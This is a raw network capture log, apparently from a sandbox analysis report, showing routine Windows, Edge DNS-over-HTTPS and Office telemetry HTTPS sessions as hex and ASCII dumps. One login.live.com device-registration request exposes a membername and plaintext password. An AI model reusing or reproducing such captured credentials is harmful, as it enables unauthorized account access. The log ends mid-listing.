2024-11-11 23:06:24 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 23:06:25 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 23:05:24 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BAY x-ms-request-id: e545ed1b-5fe1-457b-a4ef-f818e32a2052 PPServer: PPV: 30 H: PH1PEPF00012036 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 23:06:24 GMT Connection: close Content-Length: 1276
2024-11-11 23:06:25 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49793	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	446	OUT	POST /ppsecure/deviceaddcredential.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 7642 Host: login.live.com
2024-11-11 23:06:24 UTC	7642	OUT	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 75 6f 62 64 71 66 64 75 6f 6d 73 70 78 73 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 42 66 49 47 6f 48 4b 3f 32 68 2d 73 6b 50 45 2d 35 6b 42 37 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02uobdqfduomspxs</Membername><Password>BfIGoHK?2h-skPE-5kB7</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
2024-11-11 23:06:32 UTC	542	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/xml Expires: Mon, 11 Nov 2024 23:05:24 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C542_SN1 x-ms-request-id: 08072e16-369e-4f5a-b5ca-225e6eadef65 PPServer: PPV: 30 H: SN1PEPF0002F93A V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 23:06:31 GMT Connection: close Content-Length: 17166
2024-11-11 23:06:32 UTC	15842	IN	Data Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 30 30 31 31 35 30 39 31 34 41 38 32 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 63 63 62 32 34 35 62 65 2d 66 32 63 31 2d 34 38 66 65 2d 61 33 30 35 2d 65 32 36 37 63 32 31 63 61 66 38 33 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018001150914A82</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="ccb245be-f2c1-48fe-a305-e267c21caf83" LicenseID="3252b20c-d425-4711
2024-11-11 23:06:32 UTC	1324	IN	Data Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66 Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49800	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:25 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 55 00 0c 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: assetsmsncom)UQ
2024-11-11 23:06:25 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eec33bd141d3-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:25 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 09 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 54 5f 00 1c 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 07 65 64 67 65 6b 65 79 03 6e 65 74 00 c0 2c 00 05 00 01 00 00 03 83 00 16 06 65 32 38 35 37 38 01 64 0a 61 6b 61 6d 61 69 65 64 67 65 c0 43 c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 09 c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 29 c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 05 c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 06 c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 0b c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 1b c0 54 00 01 00 01 00 00 00 13 00 04 17 c8 58 27 00 00 29 04 d0 00 00 00 00 00 ef 00 0c 00 eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: assetsmsncomT_assetsmsncomedgekeynet,e28578dakamaiedgeCTXTX)TXTXTXTXTX')

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49799	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:25 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 55 00 0c 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: assetsmsncomA)UQ
2024-11-11 23:06:25 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eec33881440b-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:25 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 02 00 01 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 52 71 00 1c 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 07 65 64 67 65 6b 65 79 03 6e 65 74 00 c0 2c 00 05 00 01 00 00 01 95 00 16 06 65 32 38 35 37 38 01 64 0a 61 6b 61 6d 61 69 65 64 67 65 c0 43 c0 5b 00 06 00 01 00 00 01 f9 00 2e 03 6e 30 64 c0 5d 0a 68 6f 73 74 6d 61 73 74 65 72 06 61 6b 61 6d 61 69 c0 17 67 32 8b fa 00 00 03 e8 00 00 03 e8 00 00 03 e8 00 00 07 08 00 00 29 04 d0 00 00 00 00 01 25 00 0c 01 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: assetsmsncomARqassetsmsncomedgekeynet,e28578dakamaiedgeC[.n0d]hostmasterakamaig2)%!

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 5f09de9a-701e-0050-70d5-336767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968px8v7hC1EWR08ng00000005y000000000209t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.5	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 8377dd30-c01e-00a1-3ad5-337e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968cdxdrhC1EWRg0en00000005ng000000002g2g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 95c6b661-501e-0078-17d5-3306cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968j9dchhC1EWRfe7400000005h0000000001r6r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 31c5dc94-101e-008d-18d5-3392e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968ljs8phC1EWRe6en00000005eg00000000b3bw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 5d78e2d9-801e-00a0-72d5-332196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968cdxdrhC1EWRg0en00000005g000000000h6br x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49807	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:25 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom)QM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49806	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:25 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA)QM

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.5	49810	13.107.246.45	443

